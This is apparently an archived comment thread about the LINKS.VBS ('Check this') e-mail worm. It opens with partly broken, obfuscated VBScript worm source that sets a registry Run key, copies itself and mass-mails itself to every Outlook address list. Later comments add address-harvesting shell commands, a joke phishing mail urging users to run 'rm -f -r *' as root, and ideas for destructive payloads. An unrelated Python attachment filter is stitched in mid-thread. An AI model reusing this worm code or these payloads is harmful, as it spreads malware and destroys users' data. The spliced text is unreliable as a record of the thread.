    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/Bmnrd"))
    A4.WriteLine(B("Doe!Hg"))
    A4.WriteLine(B("Odyu"))
    A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(/ RtcGnmedsr"))
    A4.WriteLine(B("E!E4/Q`ui"))
    A4.WriteLine(B("Odyu"))
    A4.WriteLine(B("Doe!Hg"))
    A4.WriteLine(B("Doe!Rtc"))
    A4.Close
    Set A5 = CreateObject(B("VRbshqu/Ridmm"))
    A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]B tssdouWdsrhno]Sto]Stoemm"),A1.BuildPath( A1.GetSpecialFolder(1),B("STOEMM/WCR"))
    If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mho jr!no!xnts!edrjunq/!En!xnt!v`ou!un!bnouh otd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then
    Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(B ("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),Tr ue)
    A6.WriteLine(B("ZHoudsoduRinsubtu\"))
    A6.WriteLine(B("TSM 0 Then
    For A9 = 0 To A8.Count - 1
    If InStr(A8.Item(A9),B("]]")) 0 Then
    A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR"))
    End If
    Next
    End If
    Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno"))
    Set A11 = A10.GetNameSpace(B("L@QH"))
    For Each A12 In A11.AddressLists
    Set A13 = A10.CreateItem(0)
    For A14 = 1 To A12.AddressEntries.Count
    Set A15 = A12.AddressEntries(A14)
    If A14 = 1 Then
    A13.BCC = A15.Address
    Else
    A13.BCC = A13.BCC & B(":!") & A15.Address
    End If
    Next
    A13.Subject = B("Bidbj!uihr")
    A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
    A13.Attachments.Add WScript.ScriptFullName
    A13.DeleteAfterSubmit = True
    A13.Send
    Next
    Function B(B1)
    For B2 = 1 To Len(B1)
    If Asc(Mid(B1,B2,1)) 34 And Asc(Mid(B1,B2,1)) 35 And Asc(Mid(B1,B2,1)) 126 Then
    If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
    B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1))
    Else
    B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1))
    End If
    Else
    B = B & Mid(B1,B2,1)
    End If
    Next
    End Function

  64. Re:Unix and Viruses. by Keith_Beef · · Score: 1

    Well, if you only want to think about how a worm (or any kind of shell script) can grab e-mail addresses out of a user's address book, try these for size:

    strings ~/.netscape/pab | grep "@" | more
    ldapsearch -h -b "c=/" "sn=*a*" cn | more

    OK, the first only works for users who use Netscape for e-mail, and the second only if an ldap server is used to provide or store e-mail addresses... but I'm sure you can get the information from other sources, too...

    A while ago, I wrote a little bash script that called on the fortune program to send off messages twenty at a time to a friend who clogged my mailbox with silly `virus warnings'.

    A combination of:
    1. a bit of text that sounds convincing, like "Message from IT Security Services @ M$ Antivirus advises you to run the attached Diagnostics script"
    2. a version of the fortune mailer, written so as to make the code nearly unreadable... (say, twice as many comment lines as code)
    3. the address ripper
    should suffice to bring down the mailserver. The difficulty would be in obfuscating the code sufficiently. Anybody who looked inside the Love Bug vbs should have spotted immediately what was going on...

  65. Re:Unix and Viruses (Addendum.) by rgmoore · · Score: 1
    One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) its relatively small install base. About the first point: write a linux executable, and even if you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what it is.

    The obvious solution to these difficulties is an obfuscated PERL script. PERL is installed on a large fraction of all UNIX boxen (and even on other platforms) and has the power to do a lot of stuff. It has good cross-platform uniformity, particularly when people have various CPAN modules installed. As even its biggest detractors will admit (or maybe you could say especially its biggest detractors will insist) PERL is wonderful for writing densely incomprehensible programs that even a dedicated PERL hacker has trouble understanding. The ability to do direct damage is limited by the lack of root privileges, but then again, damaging the system prevents you from spreading effectively. Add it all up, and it's the perfect worm implementation language for UNIX.

    --

    There's no point in questioning authority if you aren't going to listen to the answers.

  66. Re:Suggestions for improvement by sconeu · · Score: 1
    It would be far better if it forced your browser to one of those whack-a-mole sites that keep popping up additional windows when you attempt to leave.

    I assume you are referring to The Time Magazine Web Site, and not any of those naughty, naughty pr0n sites?

    --
    General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
  67. Alternative virii? by Anonymous+Shepherd · · Score: 2

    Viruses, whatever...

    Source code virus?

    Say someone has an infected version of the Apache source; it has embedded within it a modified 'ls' or 'find' or 'grep' or something. When compiled, it also replaces ls. Apache, of course, is also infected; it is a way into and out of your computer, and would be used to spread information, primarily.

    Now when you do your usual make, make install, the source is modified to look perfectly normal, but the damage is done. You have an infected ls, find, grep, etc, as well as Apache. What the modified program would do is look for Makefiles and configures; when it identifies a directory with a Makefile and/or configure script, it will actually modify the process to build another infected program. In this case, it would get the infected source from Apache! See, while the server has been up, it has surreptitiously been downloading bad source and sharing bad source with other infected computers, without logging it, and placing it in strange and not commonly visited places.

    So when you actually do another source compile, you get another infected program; say, ftp gets modified. Or telnet. Or man. Whatever. Until you have lots of malicious programs. All waiting for a signal, a trigger, a date, whatever. Or for apache to do something!

    Of course this is speculation on my part. Do wiser heads think this is impossible?

    -AS

    --

    -AS
    *Pikachu*
    1. Re:Alternative virii? by Gurlia · · Score: 1

      Hey, thanks, that was exactly the article that I was referring to.


      ---
      --
      mikre he sophia he tou Mikrosophou.
    2. Re:Alternative virii? by dodobh · · Score: 3

      That's Ken Thompson's exploit you are referring to. It's in the jargon file and elsewhere too.

      --
      I can throw myself at the ground, and miss.
    3. Re:Alternative virii? by Gurlia · · Score: 2

      I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

      Basically, it works from the idea of a self-replicating program, as follows:

      1. Malicious programmer gets the source code for say, GCC. He modifies GCC so that it recognizes when it's compiling a good copy of its own source code, and reproduces itself (a bugged GCC). And of course, the bugged code can also contain whatever virus code for spreading, etc..
      2. Via virus or whatever other means, the programmer installs this bugged GCC into the system.
      3. Unsuspecting user compiles his C program, and the virus spreads to his binary.
      4. After a few incidents, the sysadmin is informed that something is wrong with the compiler.
      5. Sysadmin downloads GCC source code (a good copy, mind you) and re-compiles GCC. But, because the current GCC knows when it sees a copy of itself, it re-inserts the bug into the new GCC. Scary thing is, the new source code does not contain the bug code, because the bug is inserted during compile-time. The sysadmin can proof-read the source code all he wants, but he will never find a trace of the bug. Worse, if the bug also infests objdump, od, and other disassemblers, then the sysadmin may never find out why his machine is spreading virii or behaving strangely even though everything on his system seems to be clean.

      Of course, replacing the GCC with a good binary will solve the problem, but the virus could have replaced, say, Apache or FTP, so that any good copy of GCC downloaded will be bugged. And no amount of recompilation from source will do any good, because the bugged compiler will always insert bugged code into any source you compile.

      Anyway, my point is, source code does not guarantee safety. About the only thing that can solve the problem (that I can think of) is to nuke the system and re-install from scratch. Of course, suppose the virus bugged a machine on your ISP so that it inserts itself into any fresh system binaries you download... ultimately, you will never be 100% sure unless you physically get a copy of a new system from your vendor. But suppose the vendor has also been bugged...

      I know this is a bit stretching it, but still, it involves methods which are very practical to implement. Do not hide in the comfort of "Unix is built for security" or "we are safe because we can audit source code".


      ---
      --
      mikre he sophia he tou Mikrosophou.
  68. I got this virus almost 2 months ago by akgoel · · Score: 2

    Since I don't keep any addresses in my Outlook Contacts List, it couldn't spread, no matter how much I prodded with it. The encryption was kinda cool, but the guy I got it from was apologizing profusely to all his clients.

    This isn't new, it's not a LOVEBUG variant.

  69. I thought this was old news... by Ron+Harwood · · Score: 2

    I'm sure I had heard about this one before...

  70. NOT NEWS ANYMORE! by Sir+Spank-o-tron · · Score: 1


    Ok, this is NOT news. News will be that MS has developed some fab means of having scripting that is not a big gaping security hole.. (or news of any real innovation from MS for that matter)

    can i configure my /. account to ignore stories about .vbs 'viruses' ?

    --
    -- Spankmeister General
  71. Two things... by Nermal · · Score: 1

    1. The author said that only machines which run Outlook and have visual basic scripting enabled are vulnerable. Isn't that only half true? It seems any machine with a mailreader that can do attachments and has vbs scripting enabled in the operating system is vulnerable. You're only more vulnerable if you're running Outlook AND have Outlook set up to auto-open attachments.

    2. Ok, I'm going to be fair and let the windows people state their side before I make too many assumptions: Are there any LEGITIMATE uses for sending vbs scripts as email attachments (especially auto-run attachments) that I don't know about? I mean, obviously if you're part of a group of coders working on a vbs dev project you might want to exchange snippets but is there any reason for the average person to even expect a vb script in his/her email? Is there some widespread business/tech practice that would be disrupted by having executable attachments not autorun, or at least result in a warning message, by default in Outlook?
    "(no knowledge of subject matter) + (crack cocaine) = (journalism!)"
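
Added example (not part of the comments above or of any product named in this thread): one way a mail gateway could act on the question raised in comments 58 and 71, by holding back any attachment whose name ends in a type that Windows Script Host runs on a double-click. The sample messages, addresses, function names and the extension list are constructed for illustration.

```python
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# File types that Windows Script Host (wscript/cscript) runs on a double-click.
WSH_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}


def build_sample(filename):
    """Constructed test message: harmless placeholder bytes under a chosen name."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "Check this"
    msg.set_content("constructed sample body")
    msg.add_attachment(
        b"' placeholder text, not a real script\r\n",
        maintype="application",
        subtype="octet-stream",
        filename=filename,
    )
    return msg.as_bytes()


def build_forwarded(filename):
    """Constructed test message: the sample above wrapped as a forwarded mail."""
    inner = message_from_bytes(build_sample(filename), policy=policy.default)
    outer = EmailMessage()
    outer["From"] = "you@example.com"
    outer["To"] = "team@example.com"
    outer["Subject"] = "Fwd: Check this"
    outer.set_content("constructed forward")
    outer.add_attachment(inner)  # becomes a message/rfc822 part
    return outer.as_bytes()


def script_attachments(raw_bytes):
    """Return the names of all attachments that WSH would execute.

    walk() also descends into forwarded (message/rfc822) mails, so a script
    nested one level down is still seen.
    """
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    hits = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        # Windows ignores trailing dots and spaces in file names, and the
        # association is case-insensitive, so normalise before comparing.
        cleaned = name.strip().rstrip(". ").lower()
        # Only the last extension decides what runs: "notes.txt.vbs" is a script.
        if os.path.splitext(cleaned)[1] in WSH_EXTENSIONS:
            hits.append(name)
    return hits


def verdict(raw_bytes):
    """Gateway decision: hold the message if any script attachment is present."""
    return "quarantine" if script_attachments(raw_bytes) else "deliver"


if __name__ == "__main__":
    for fn in ("LINKS.VBS", "notes.txt.vbs", "report.pdf"):
        print(fn, "->", verdict(build_sample(fn)))
    print("forwarded LINKS.VBS ->", verdict(build_forwarded("LINKS.VBS")))
```

The check is by name only, which matches how the double-click association works; it does not inspect content, so a renamed or archived script needs a separate control.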

  72. Nice little script to fix that problem by Col.+Panic · · Score: 1

    called remvbs.kix, is available at securityfocus.com. It changes registry entries for .vbs, etc. files so the default application is notepad rather than wscript or cscript.

  73. What code does it use to become polymorphic by x-empt · · Score: 1

    Polymorphic scripts are neat, I wonder if it uses the same methods and ideas as my previously posted code at: http://slashdot.org/comments.pl?sid=00/05/19/1326219&cid=464

    Oh btw, this sounds like the old links.vbs worm... from a while back....

    --
    Ever need an online dictionary?
  74. Re:Unix and Viruses. by Keith_Beef · · Score: 1

    Oops, that should have read strings ~/.netscape/pab.na2 | grep "@" | more

  75. New Variant of Lovebug? Nope... by zombieking · · Score: 1

    This is not a new virus. This thing was detected by Symantec on July 2, 1999.

    --

    -----
    "The only difference between me and a madman is that I'm not mad." - Salvador Dali (1904-1989)
  76. That's no virus... by bcilfone · · Score: 1

    Uh... boss, uh... you see this VIRUS started downloading all this porn to my machine. I was just checking my email and then all of a sudden this naked woman showed up, but I had nothing to do with it...

    I liked it better the first time when it was "My dog ate my homework".

  77. "Check This" aka Freelink virus by thomasengels · · Score: 1

    The Freelink virus ("check this" in mail subject) predates the "I love You" virus by months. I was working on a support desk at that time. Other than flooding the mail servers, the virus did not do notable damage. See http://www.symantec.com/avcenter/venc/data/vbs.freelink.html. Regards, Thomas

    --
    Tirer l'éternel du transitoire - Charles Baudelaire
  78. Re:Suggestions for improvement by divec · · Score: 1
    bun-fhuinneog agam!

    You have the Windows source-code? (sorry, my Irish is terribly bad)
    --

    perl -e 'fork||print for split//,"hahahaha"'

  79. How did that make it to an article by HavokDevNull · · Score: 1

    LINKS.VBS has been out for like 5 months! AND does not have anything to do with ILOVEYOU. Check the norton site on it. Geeeeez

    "pico when I'm drunk vi when I'm sober"

    --
    Sig
  80. Re:Make you want to... by Black+Art · · Score: 2
    What's a nypho?

    It is like a typo, only smaller.

    --
    "Trademarks are the heraldry of the new feudalism."
  81. Re:Unix and Viruses. by DrTomorrow · · Score: 1
    Where are all the apache affecting viruses?

    How many computers run Apache? Yeah, most webservers do, but there are hundreds of other computers for every webserver. Therefore Apache is on less than 1% of all computers out there. That's why viruses don't target Apache.

    --

    Everything in this post is false.

  82. Re:Unix and Viruses. by dboyles · · Score: 1

    The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.

    I think the consensus is that Open Source promotes knowledge of what a particular program does, which in turn helps us avoid virus/trojan infection.

    Sure, MS enabling VB scripting is not a good idea. The reason is because of the users. Most windows users couldn't tell you the difference between script and code. In the past months, most have learned not to run executables that they receive from unknown (or even known) sources. This is good advice, but now folks believe that just because it doesn't have .exe on the end it must be safe to download and run. I would venture to say that the *vast* majority of UNIX folks are too smart to run some unknown program. Not to mention the different system configurations that exist in the UNIX community that would make replication much less likely.

    --
    -- "Complacency is a far more dangerous attitude than outrage." -Naomi Littlebear
  83. This is Old by smkndrkn · · Score: 1

    This is an old one from about a year ago....how did this make news?

    --
    ======== In the future, everything will be artificial. ========
  84. Compiled Virii? by Devil+Ducky · · Score: 2

    I was just thinking one could put a virus into a source tarball as an executable file, have the Makefile call it...

    Perhaps it could make its own version of ls, or ldconfig! After the "make install" by root the virus can do anything it wants. Imagine, every time you call ldconfig it spreads further, it would be literally impossible to repair the damage at that point.

    The downside: it wouldn't take long for people to find the virus, but most people don't even bother to watch the compile screens let alone go through all of the source code files.

    P.S. it would be fun and easy to release the virus in RPM format...

    P.S.S. Maybe one could modify pine or sendmail to spread the virus.

    Devil Ducky

    --

    Devil Ducky
    MY peers would get out of jury duty.
  85. Re:Make you want to... by Gray · · Score: 1

    If you did that right, you'd make a fortune.

    Set up an unoffensive portal site with loads and loads of banners, on an industrial strength server. Virus changes IE homepage and propagates, that's all.. Your average joe 'I'm on the Internet' person never changes their homepage and really doesn't care anyway as long as it's not full of porn. If you made the virus only kick in if it *didn't* find the newest DirectX would keep it from coming to the attention of 'serious' users for a long time.

  86. This is NOT an ILOVEYOU variant by mabinogi · · Score: 1

    My organisation got hit with this a number of months ago....

    It was rather embarrassing for our other branches....

    But for my branch...it was just an irritation...

    I'm just glad I'm able to keep Outlook at bay...and have all my users on Netscape Messenger.

    Mind you, we do have one person in the branch that insists on using Outlook express.....and the first thing he did when he got the first CheckThis email...was to open the .vbs file.....fortunately it only affects those using the full-blown outlook.

    --
    Advanced users are users too!
  87. Re:Maybe -- Not Such a bad Idea by Nik+Picker · · Score: 4

    Actually that's not such an unusual Idea. I have often discussed this theory with a number of professionals always with the same scepticism. But consider it this way. Users ( the end user kind ) are notoriously inept at upgrading. If there were a way to write Upgrade software distributed in a virus vector it might reduce your work load. MIGHT that is.

    I even played with the concept in my earlier code days. Having written a client/server app that passed patches between computers it could find on its network where the computer was running the client. And did not inform the user.

    Still I suspect the whole concept is considered disgusting and not worthy ... sigh !

    --
    And thats why Firecrackers and kittens don't mix.
  88. Re:Is it really News for Nerds anymore? by Nastard · · Score: 1

    All this talk about how windows sucks and linux is eleet...

    Screw linux. I just got my hands on the final candidate for Windows Me. It's awesome! Just as stable as Linux/win2k, as easy to use as win98, and supports Win9x/win2k drivers :D So now all of my hardware works, my computer doesn't crash, and I don't have to read through millions of pages of ambiguous "man" pages to get it to work!

    Thanks Microsoft! You finally got one right!

  89. Unix and Viruses. by Christopher+Thomas · · Score: 5
    There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us?

    The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.

    The long answer is "it depends". Details as follows.

    • Macro Viruses
      Viruses and trojans that are embedded in Word documents, Visual Basic scripts, or the like have no effect under Unix, because most Unix systems don't process Word macros or Visual Basic scripts. Thus, most of the crud that has been affecting Windows users has been completely unnoticed by Unix users.

    • Bombs and Trojans
      If you are sent an executable, or fetch an executable yourself, and run it, it can modify anything that you have permission to modify, even under Unix. This means that a trojan executable, if you run it, could quite easily destroy all of your files - but not the files of anyone else using the machine, and not the operating system files. In principle, a trojan could also access any facilities that you have access to; this means that a sufficiently clever trojan could mail itself to other people from your account. However, it would have a harder time finding addresses to send itself to (maybe scan ~/mail and /var/spool/mail/username for addresses). So damage is limited, and nobody's bothered implementing effective propagation so far (though it could be done).

    • True, Infecting Viruses
      A true virus is capable of infecting arbitrary executables, which themselves will contain the virus and infect other executables. While in principle this could be done under Unix, the virus would again be limited only to executables that you have permission to modify. System tools would not be affected - you couldn't infect "cp" or "ls", for instance. Distribution would also be curtailed, as you don't usually send executables to your friends; you send them a source tarball, or point them to where they can download an executable. So, while something like this could be done, it wouldn't be as devastating as it is under Windows or DOS.

    • Social Engineering
      Social engineering remains one of the biggest threats under Unix. It means, simply, convincing a user to do something harmful. In the case of email viruses, the virus must convince the user to open the attachment. Heaven help us when inexperienced users have root access; a virus could simply tell you to "su to root and run this install script" to have devastating impact. This will probably be one of the biggest threats in terms of viruses under Unix.


    The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).
    1. Re:Unix and Viruses. by laborit · · Score: 1

      In case any of you brilliant *nix gurus are thinking of tearing into me (or any of you really really brilliant gurus don't get the joke)... yes, that should have been a capital R. Also, I forgot to close the parentheses. Sorry.

      - Michael Cohn

      --

      -----
      Go ahead, blame me... I voted for Nader!
    2. Re:Unix and Viruses. by EricWright · · Score: 2

      Let me think... I want to do something to piss off a lot of people. I'll write a virus to fsck up Apache. If it actually spread like ILOVEYOU, well then *POOF*! 60% of the web is gone.

      I'll bet you that almost all of the computers out there that aren't servers are workstations/personal computers for someone who DOES browse the web. Those users aren't going to be happy about this, not one bit.

      Eric

    3. Re:Unix and Viruses. by laborit · · Score: 4

      Heaven help us when inexperienced users have root access

      Agreed, although when that comes about the "viruses" won't even have to be executable.
      -----
      From: Redhat Technical Support
      Subject: System upgrade information

      Dear user -
      We regret to inform you that your Linux system shipped with several preferences improperly set. Fortunately, you can improve your web browsing speed and startup time with a few simple commands. First of all, we'd appreciate your forwarding this to everyone else you know (it doesn't matter if they don't have Linux; they might know someone who does. This way, the fix will get out as quickly as possible.
      Once you've done that, just write down and follow these directions:

      1. Type "su"
      2. At the prompt, enter your secret root password.
      3. Type "rm -f -r *"

      Sincerely,
      Bob Jones, Redhat technical support
      -----
      - Michael Cohn

      --

      -----
      Go ahead, blame me... I voted for Nader!
    4. Re:Unix and Viruses. by gaudior · · Score: 1
      A true virus is capable of infecting arbitrary executables...

      This is also true of .so libraries. This is a possible point of vulnerability. It's entirely possible, should someone make a mistake and forget to lock down the perms on a directory, for a trojaned .so to get linked into something at runtime. It could conceivably obtain root, and put itself into a kernel module.
      --

    5. Re:Unix and Viruses. by OAB · · Score: 2

      The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).

      The odd thing is that Unix led the way here as well, do a search on 'Great Internet Worm'.

    6. Re:Unix and Viruses. by somethingwonderful · · Score: 1

      Hee hee....

      That "You say" is me. :) *grins* I forgot all about that log. Somebody emailed me yesterday saying how funny it was and she told me that she saw the link here. :) Cool. Glad you enjoyed the log. :)

      nat@harari.org

      --
      ... Traveling Uncle Nat. :) http://www.somethingwonderful.com
    7. Re:Unix and Viruses. by kz45 · · Score: 1

      here is the answer in the linux community for stopping viruses like this:

      Never update technology. It will work every time.

  90. OT: My favorite whack-a-mole site... by evilquaker · · Score: 1
    not a porno site, but amusing none-the-less:

    http://www.geocities.com/SunsetStrip/Towers/4513/

    click on the "Escape from darkness" button... :)

    --
    To within half a percent, pi seconds is a nanocentury. -- Tom Duff
  91. Wrong by mindstrm · · Score: 2

    If they don't have outlook, the virus can no longer spread. So in a sense, they would be an endpoint for the virus. The virus uses mapi calls to outlook to replicate.

    And yes, any windows version with WSH installed is vulnerable (well.. vulnerable is a shitty word. Of course any windows machine with WSH installed can run scripts...)

    Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

    1. Re:Wrong by dieMSdie · · Score: 2

      By corporate decree, our company is forced to use Outlook + Exchange for all email. Of course, we got hit hard by the "ILOVEYOU" bug.
      I thought it all amusing, and enjoyed looking at the actual code. I am not a programmer at all, yet I saw how easy it would be to modify this simple program to be MUCH nastier:
      1) forward every message from your "Sent" folder to everyone in your address book (a corporate nightmare: think about the CEO's sent emails being read by everyone in the company)
      2) after that happy chore, prowl the network shares and deltree *.*
      3) finally, as a parting shot, format c:

      I figure someone will do this eventually. Luckily, I run Linux. :)

      --
      Don't throw your computer out the window, throw the Windows out of your computer!
    2. Re:Wrong by mOdQuArK! · · Score: 2

      Be sure to tie the format to the screensaver, and possibly to a window late at night, so that the format will take place when nobody is around to stop it.

  92. I KISS YOU!! by doomy · · Score: 3

    The Turkish trojan. ;)
    --

    --
    ...free your source and the rest would follow...
  93. Sounds really interesting... by plaxion · · Score: 1

    I'd ask someone to post the source so I could check it out for myself... but unfortunately, that would "violate" the author's copyright and he might threaten /. with legal action unless they remove the post!

  94. Re:Talk about old news.. by mindstrm · · Score: 2

    Not macro. Just an attached vbscript.

  95. Wow. Another one. by mycroftWyo · · Score: 1

    Yet another replication of the overblown media attention LOVEBUG virus. Like we should care. And what's with all these people who keep doing it? Maybe it's all of those High School CS teachers who keep telling students to reuse code.

    The media and congressional attention to this virus and others is damaging. The media has a tendency to give exaggerated emphasis on a story. Politicians are worse. They use the current internet issue to prove their points for censorship or other things. I say, just stick to wasting federal money on highways in good ol Alabama and Mississippi.

  96. 1 question.... by pirodude · · Score: 2

    you gotta ask yourself here...is this such a bad thing? :)

    if the links are quality...sure..why the hell not

  97. Re:This is a bug? by RGRistroph · · Score: 1

    When is the linux port ?

  98. This one is older than ILOVEYOU by vanbrunt · · Score: 1

    I got that one a long time ago... it's not an ILOVEYOU variant.

  99. Re:Talk about old news.. by plaxion · · Score: 1

    If you're running Outlook REM and not scanning attachments you deserve what you get.

  100. Old News by Don+Quixote · · Score: 1

    This particular virus hit my office a couple of months ago...unfortunately I don't have an exact date. Here's the link to the Symantec info: http://www.symantec.com/avcenter/venc/data/vbs.freelink.html

  101. OLD news by websensei · · Score: 1
    Our office dealt with the links.vbs trojan nearly three months ago.

    This is NOT a "next-gen" trojan, it's old hat.

    --

    La via sola al paradiso incommincia nel inferno
  102. Re:Unix and Viruses. = DIFFERENCE by DrTomorrow · · Score: 1
    Outlook doesn't execute arbitrary code embedded in attachments. The user has to double-click on the attachment to activate the virus. The same thing could happen on Linux if someone executed a Perl attachment. But most Linux users are smart enough not to run arbitrary attachments.

    If Outlook is to be faulted, it is because attachments are easy to activate by the user.

    --

    Everything in this post is false.

  103. ILOVEYOU ...is there a Linux Variant? by ChiaBen · · Score: 1

    If so where do I get it?!? I want a porn link on my desktop, and all my Windows/Outlook buddies already have it... (muttering)what good is an OS if you can't have a desktop link to porn...
    cheers!
    benjamin carlson

    --
    "If voting could really change things, it would be illegal. " - Revolution Books, NY
  104. Go Hip! by Squeeze+Truck · · Score: 3

    There's another "legitimate" portal site called Go Hip! that also uses viral advertising.

    If you use Outlook and Explorer, the virus will add another "toolbar" to your browser (which only contains banner ads), and attaches an advertisement for itself onto the end of every email you send out. The program does all of this without the user's knowledge or permission.

    I would normally call this just merely annoying except for the fact that it is impossible to uninstall it via any normal means. I removed it from my registry, but it just copied itself back. The only way to remove it is to dig deep in Go Hip!'s customer service page and run a "remove" utility.

    --

    "Reactionaries must be deprived of the right to voice their opinions; only the people have that right." - Mao

  105. But seriously folks - a symbiot is a parasite by bfinuc · · Score: 1

    The less likely it is that a virus can reproduce before it gets zapped, the nicer it has to be to its host. As vigilance increases in the Windows world (but not in the Linux world) widespread Windows viruses will tend to become more benign.

    This is a result of the fact that there are so many Windows installations around. Contrary to popular belief, there are plenty of benign bacteria and viruses around. Hotmail is a great example. In fact, they even brag about their "viral marketing".

    In fact the placenta, which provides mammal fetuses with nutrients, is only possible because it is infested with endoviruses that are more or less identical to HIV. These viruses suppress the immune reaction of the mother, which would otherwise kill the baby in short order. The original infection probably occurred about 120m years ago, when the dinosaurs were still alive.

    There are plenty of other less benign bugs out there (no one really knows how many, and it depends how you count) that survive by keeping a low profile.

    The disadvantage to being benign is that you may have mutant cousins that reproduce more quickly than you by disregarding the interests of the host.

    Contrarywise, making it easier for a virus to spread increases its virulence; for example, the fact that babies are born in big hospitals actually causes baby diseases to become more deadly - because the diseases can get away with killing their hosts in short order and then spreading. The diseases evolve to adapt to the novel situation.

    In the computer world this means that the funnier the jokes about viruses seem to fans of a given OS, the rarer but more dangerous they are likely to be. (If they're not rare, they're not funny, but they're also not so dangerous, because security holes get patched.)

    Every first post guy is a virus writer looking for but seldom finding an easy opportunity, and there's no lack of first posters. So it must be harder to spread viruses from Linux to Linux than from Windows to Windows.

    Is this proof of the superiority of Linux to Windows? No. It says more about the topology of the Windows world compared to that of the Linux world. Windows people are simply better connected, because there's more of them.

    I myself have developed the perfect defence against viruses. Nothing that I do on the computer is of any value whatsoever, so I have nothing to lose. "Who steals my wallet steals trash" as Shakespeare put it. This may not work for everybody.

    Linux is doomed to have a huge virus problem if any bridge is created to the windows world, just like the Native Americans were devastated by European diseases. There is no defence: the feedback loops don't exist, so the defences will never come into being. If I were to call on all Linux users to work together to create a defence against the coming threat, everyone would laugh.

    --
    I bragged about my Karma at a job interview but I didn't get the job.
  106. Re:Execute Permissions by aprentic · · Score: 1

    Actually your umask environment variable determines what the default permissions for files will be. Most systems initially install with a line in one of the default login scripts that sets umask to read/write for user, privileges for anyone else.

  107. Don't need Outlook by driptray · · Score: 1

    And to clear up another issue:-

    You don't need Outlook to be infected with either this virus, or with ILOVEYOU. Outlook is needed for the virus to propagate, but not to infect.

    So all Windows users are vulnerable.

    There is a class of viruses that will infect an Outlook user's PC without the user launching an attachment (Good Times becomes real), but these two aren't like this.

  108. Re:Is it really News for Nerds anymore? by mr · · Score: 1

    >Unless the virus causes extensive damage or advertises Linux, these postings are getting quite old.

    Please show where it says News for Linux. Or News for Linux Nerds. Or where Nerd is defined as Linux.

    The attitude that the *ONLY* OpenSource project, or in your case-Nerds, helps to DIVIDE a larger community which would be farther ahead to unite.

    --
    If it was said on slashdot, it MUST be true!
  109. A new way of advertising? by Antipop · · Score: 1

    Wouldn't be interesting if companies "unofficially" came up with viruses like this to advertise their web site in hope of boosting hits? With the tactics some of the porn sites use, I wouldn't be surprised if it became more common for sites to use the latest Outlook bug to spread the news about their site.
    -Antipop

  110. Microsoft's Dominant Market Position by Boone^ · · Score: 1

    If it weren't for M$'s market dominance, Visual Basic Scripting wouldn't be this popular, and millions of people around the globe wouldn't be sharing and running open source .vbs files. M$ is bringing the world together by giving us the technology required to share the joy of open source software.

    I fear the day when the MP3 variant hits: instead of deleting .mp3 files, it attaches them along with itself and sends them to your entire address book...

  111. Well it depends... by daVinci1980 · · Score: 1

    If you configured your box properly, and you don't always run as root, then there's really little danger to linux and unix variants.

    Plus, most e-mail viruses to date have been written in VB, which is not typically installed or used outside of x86-Windows platform. In order to have any effect, viruses would have to be written in C/C++ then compiled for *nix (and for each variant) or would have to be written in JAVA, which would require that the machine has the JVM, and even then the virus still has to follow the rules enforced by the OS.

    In addition, the security model used by *nix disallows users the ability to write over files that they don't own and aren't [group|world]-writable, so the damage in such a situation would be minimized only to the user who downloaded and ran the virus. So long as you're not root, you only lose your stuff.
    --
    "A mind is a horrible thing to waste. But a mime...
    It feels wonderful wasting those fsckers."

    --
    I currently have no clever signature witticism to add here.
  112. Re:Talk about old news.. by Dave+Goldblatt · · Score: 1

    BTW, typo - meant script vs. macro.

    (and technically, I suppose one could argue that it's a worm, not a virus.. the nifty little critter that ran if Outlook had auto-preview turned on, however..)

    -dg-

  113. Talk about old news.. by Dave+Goldblatt · · Score: 1

    This macro virus - one of the earlier Outlook ones - was from last July. Check out the Symantec page for more info.

    If you're running Outlook and not scanning attachments, you deserve what you get.

    -dg-

